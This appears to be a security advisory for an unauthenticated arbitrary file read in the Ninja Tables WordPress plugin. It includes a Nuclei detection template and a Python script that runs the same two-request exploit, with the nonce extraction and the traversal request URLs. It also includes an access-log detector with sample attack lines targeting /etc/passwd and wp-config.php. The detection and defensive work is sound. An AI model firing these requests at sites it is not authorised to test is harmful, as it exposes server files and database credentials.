wp-ninja-tables-lfi: Ninja Tables <4.1.9 - Unauthenticated Arbitrary File Read

Date: 2025-08-01 | Affected software: Ninja Tables | PoC: public

Vulnerability description

The Ninja Tables plugin for WordPress (versions below 4.1.9) contains an unauthenticated arbitrary file download vulnerability caused by improper validation of the 'url' parameter in the 'ninja_table_force_download' AJAX action. An unauthenticated attacker can use it to read arbitrary files from the web server, such as wp-config.php with the site's database credentials. The action still requires the plugin's public nonce, so the PoC below first fetches the site's front page and extracts 'ninja_table_public_nonce' from it; the check therefore only fires on sites that render a table on '/', and reads /etc/os-release as a low-sensitivity proof file rather than pulling credential material off the target. The fix is to update to 4.1.9 or later.

PoC code [public]

id: wp-ninja-tables-lfi

info:
  name: Ninja Tables <4.1.9 - Unauthenticated Arbitrary File Read
  author: xbow,DhiyaneshDk
  severity: high
  description: |
    The Ninja Tables plugin for WordPress (versions < 4.1.9) is vulnerable to an unauthenticated arbitrary file download vulnerability. The issue exists due to the improper validation of the 'url' parameter in the 'ninja_table_force_download' AJAX action.
  impact: |
    An unauthenticated attacker can download sensitive files from the server, such as '/etc/passwd' or '/wp-config.php', potentially exposing sensitive information including database credentials.
  remediation: |
    Update the Ninja Tables plugin to version 4.1.9 or later.
  reference:
    - https://xbow.com/blog/xbow-ninja-tables/
    - https://ninjatables.com/docs/change-log/#521-date-july-9-2025
  metadata:
    verified: true
    max-request: 2
    vendor: wpxpo
    product: ninja-tables
    fofa-query: body="/wp-content/plugins/ninja-tables/"
  tags: ninja-tables,file-download,wordpress,unauth,lfi,wp-plugin,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - contains(body, "ninja_table")
        internal: true

    extractors:
      - type: regex
        name: public_nonce
        part: body
        group: 1
        regex:
          - '"ninja_table_public_nonce":"([a-z0-9]+)"'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=/etc/os-release&ninja_table_public_nonce={{public_nonce}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, "application/octet-stream")
          - status_code == 200
          - contains(body, "PRETTY_NAME=")
        condition: and
# digest: 4a0a00473045022075207e335a87a36192c71c057e0bb2f056b39b92685ca12302abf3ffff51dbbe022100a96f0f3ba0984e9312e90c8cb8bb102024d0d5a1375ffb6c809c6bbc0b171678:922c64590222798bb761d5b6d8e72950
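The same two-request check as plain Python, so the nonce extraction, probe URL and the response conditions can be read step by step, plus an access-log matcher for the defensive side of the same action. This is an added example, not code from the Nuclei template, from xbow or from the Ninja Tables project. It assumes (the page does not say) that the nonce is emitted as the JSON key "ninja_table_public_nonce" on a page that renders a table and that WordPress lives at the root of the host; the HTML, responses and log lines are constructed for the example, and what a legitimate 'url' value looks like is likewise an assumption.

```python
"""Plain-Python version of the wp-ninja-tables-lfi check (added example, see lead-in)."""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

NONCE_RE = re.compile(r'"ninja_table_public_nonce":"([a-z0-9]+)"')  # same regex as the template
AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "ninja_table_force_download"
# The template reads /etc/os-release, not /etc/passwd: it proves the read
# without pulling sensitive data off somebody else's host.
PROOF_FILE = "/etc/os-release"


def extract_public_nonce(html: str):
    """Request 1: pull the public nonce from a page that renders a Ninja Table (None if absent)."""
    m = NONCE_RE.search(html)
    return m.group(1) if m else None


def build_probe_url(base_url: str, nonce: str, path: str = PROOF_FILE) -> str:
    """Request 2: the force_download action with an attacker-controlled 'url' value."""
    query = urllib.parse.urlencode({"action": ACTION, "url": path, "ninja_table_public_nonce": nonce})
    return base_url.rstrip("/") + AJAX_PATH + "?" + query


def looks_like_disclosure(status: int, content_type: str, body: bytes) -> bool:
    """The template's three matchers AND-ed: HTTP 200, octet-stream, os-release content."""
    return status == 200 and "application/octet-stream" in content_type.lower() and b"PRETTY_NAME=" in body


def probe(base_url: str, timeout: float = 10.0):
    """Run both requests live. True/False, or None when '/' renders no table (no nonce)."""
    with urllib.request.urlopen(base_url, timeout=timeout) as resp:
        nonce = extract_public_nonce(resp.read().decode("utf-8", "replace"))
    if nonce is None:
        return None
    try:
        with urllib.request.urlopen(build_probe_url(base_url, nonce), timeout=timeout) as resp:
            return looks_like_disclosure(resp.status, resp.headers.get("Content-Type", ""), resp.read())
    except urllib.error.HTTPError:  # 4xx/5xx is a negative result, not a crash
        return False


# --- defensive side: spot abuse of the action in web-server access logs ---
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) [^ "]*admin-ajax\.php\?(?P<q>[^ "]*) ')


def flag_request(query: str):
    """Return the decoded 'url' value when it targets a filesystem path (absolute path,
    traversal, or a non-HTTP stream wrapper). Decode first so %2F and %2e%2e do not
    slip past a literal match; a plain https URL (assumed benign use) is ignored."""
    params = urllib.parse.parse_qs(query)
    if params.get("action", [""])[0] != ACTION:
        return None
    target = params.get("url", [""])[0]
    if target.startswith("/") or ".." in target or (
        "://" in target and not target.startswith(("http://", "https://"))
    ):
        return target
    return None


def scan_log(lines):
    """Return (client_ip, requested_path) for every suspicious force_download request."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            target = flag_request(m.group("q"))
            if target is not None:
                hits.append((m.group("ip"), target))
    return hits


# Constructed sample data (not captured from a real site).
SAMPLE_HTML = ('<script>var ninja_table_vars = {"ajax_url":"/wp-admin/admin-ajax.php",'
               '"ninja_table_public_nonce":"3f9a1b2c4d"};</script>')
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:15:02 +0000] "GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=%2Fetc%2Fpasswd&ninja_table_public_nonce=3f9a1b2c4d HTTP/1.1" 200 2481 "-" "curl/8.5.0"',
    '203.0.113.7 - - [01/Aug/2025:10:15:09 +0000] "GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=https%3A%2F%2Fwp.example.test%2Fwp-content%2Fuploads%2F2025%2F07%2Ftable.csv&ninja_table_public_nonce=3f9a1b2c4d HTTP/1.1" 200 913 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Aug/2025:10:16:00 +0000] "GET /wp-admin/admin-ajax.php?action=ninja_table_force_download&url=..%2F..%2F..%2Fwp-config.php&ninja_table_public_nonce=3f9a1b2c4d HTTP/1.1" 200 3102 "-" "python-requests/2.32"',
    '198.51.100.4 - - [01/Aug/2025:10:16:03 +0000] "GET / HTTP/1.1" 200 48211 "-" "python-requests/2.32"',
]

if __name__ == "__main__":
    if len(sys.argv) > 1:  # live check against a site you are authorised to test
        print(f"{sys.argv[1]}: {probe(sys.argv[1])}")
    print("probe URL:", build_probe_url("https://wp.example.test", extract_public_nonce(SAMPLE_HTML)))
    for ip, path in scan_log(SAMPLE_LOG):
        print(f"suspicious force_download from {ip}: {path}")
```

Run it with a base URL as the only argument to perform the live two-request check; without arguments it only exercises the parsers on the constructed samples. In the log matcher the query string is percent-decoded before inspection, so encoded traversal such as `..%2F` and wrapper schemes such as `php://` are caught; a rule that greps the raw line for the literal `/etc/` would miss both.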
